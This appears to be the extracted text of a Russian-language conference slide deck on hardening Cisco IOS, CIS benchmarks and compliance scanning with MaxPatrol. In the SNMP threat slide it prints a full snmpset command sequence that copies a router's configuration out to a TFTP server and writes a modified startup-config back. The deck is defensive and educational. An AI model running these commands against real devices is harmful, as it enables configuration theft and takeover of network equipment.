Сканирование Cisco IOS в MaxPatrol

Сафронов Илья

What’s the deal? ― Безопасность сетевых устройств (Cisco IOS) ― Стандарты безопасности ― Контроль за соответствием стандартам безопасности

PresenterPresentation NotesТут скажем что презентация о безопасной настройке IOS, соответствия стандартам безопасности и использования Maxpatrol.Презентация будет полезна для админов/безопасников сетей, которые могут прикупить себе МП для решения задач по приведению сети в безопасное состояниe

Cisco security hardening ― Комплексный подход к безопасности устройств Cisco.

• Management Plane (управляющий IOS’ом трафик (SSH, SNMP))

• Control Plane (трафик управления сетью (BGP, STP)) • Data Plane ( проходящие сквозь устройство данные)

Security benchmarking -CIS Рекомендации и стандарты по безопасности оборудования и ПО.

CIS – Cisco IOS

― Бенчмарк по безопасности для Cisco IOS

CIS – Cisco IOS Группы проверок:

― AAA ― SNMP ― Global services (CDP, DHCP, HTTP) ― Logging ― Neighbor authentication (EIGRP, OSPF, RIP)

Как проверить? ― Max Patrol

Чего бояться?

Проверка SNMP

Настройки на устройстве

Угроза – Snmpwalk enumeration

Угроза - Копирование файла конфигурации через SNMP

TFTP-сервер

snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address . snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config

snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1

///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройство snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address . snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 //Перезагрузка устройства для применения изменений

Решение?

Проверка finger

Настройки на устройстве

Угроза – login enumeration

Решение?

Проверка HTTP

Настройки на устройстве

Угроза – кража учетных данных

Решение ?

Проверка CDP

Настройки на устройстве

Угроза - Enumeration через CDP

Решение ?

Аутентификация OSPF

Настройки на устройстве

Угроза – «Отравление» таблиц маршрутизации

Решение?

Кастомный стандарт ― Не нравится / не подходит стандарт? ― Собери свой!

Заключение ― Защищайте свои сетевые устройства ― Следите за стандартами безопасности ― Регулярно проводите аудит сети

Конец рассказа Спасибо за внимание

Сафронов Илья

isafronov@ ptsecurity.ru

Slide Number 1Сканирование Cisco IOS в MaxPatrolWhat’s the deal?Cisco security hardeningSecurity benchmarkingCIS – Cisco IOSCIS – Cisco IOSКак проверить?Чего бояться?Проверка SNMPНастройки на устройствеУгроза – Snmpwalk enumeration�Угроза - Копирование файла конфигурации через SNMP�Решение?Проверка fingerНастройки на устройствеУгроза – login enumerationРешение?Проверка HTTPНастройки на устройствеУгроза – кража учетных данныхРешение ?Проверка CDPНастройки на устройствеУгроза - Enumeration через CDPРешение ?Аутентификация OSPFНастройки на устройствеУгроза – «Отравление» таблиц маршрутизацииРешение?Кастомный стандартЗаключениеSlide Number 33Slide Number 34